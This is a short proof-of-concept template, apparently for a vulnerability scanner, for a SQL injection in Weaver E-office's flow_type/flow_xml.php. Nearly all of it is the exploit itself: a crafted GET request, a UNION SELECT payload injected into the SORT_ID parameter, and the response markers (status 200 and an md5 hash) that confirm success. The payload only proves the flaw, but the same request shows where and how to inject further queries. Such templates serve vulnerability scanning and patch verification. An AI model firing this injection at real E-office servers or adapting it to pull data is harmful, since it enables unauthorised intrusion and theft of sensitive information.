<DudePoc_Name>泛微 E-office flow_xml.php 存在SQL注入漏洞</DudePoc_Name>
<DudePoc_Description>泛微 E-office flow_type/flow_xml.php存在SQL注入漏洞，攻击者可利用该漏洞获取系统敏感信息等。</DudePoc_Description>
<DudePoc_SetHeader>
GET /general/system/workflow/flow_type/flow_xml.php?SORT_ID=1$<AttackCode>$ HTTP/1.1
Host: $<AttackHost>$
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>e4da3b7fbbce2345d7772b0674a318d5</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode>%20union%20select%201,(md5(5)),3,4,5,6,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1</DudePoc_AttackCode>
